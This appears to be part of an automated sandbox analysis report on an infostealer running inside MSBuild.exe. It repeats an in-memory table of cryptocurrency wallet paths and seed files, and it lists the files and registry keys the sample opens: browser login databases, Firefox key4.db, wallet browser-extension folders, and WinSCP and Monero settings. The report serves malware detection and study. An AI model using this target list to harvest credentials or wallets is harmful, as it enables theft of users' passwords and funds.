Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe	String found in binary or memory: ElectrumLTC
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1669807678.0000000003321000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: set_UseMachineKeyStore
Source: MSBuild.exe	String found in binary or memory: \Electrum-LTC\wallets\

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
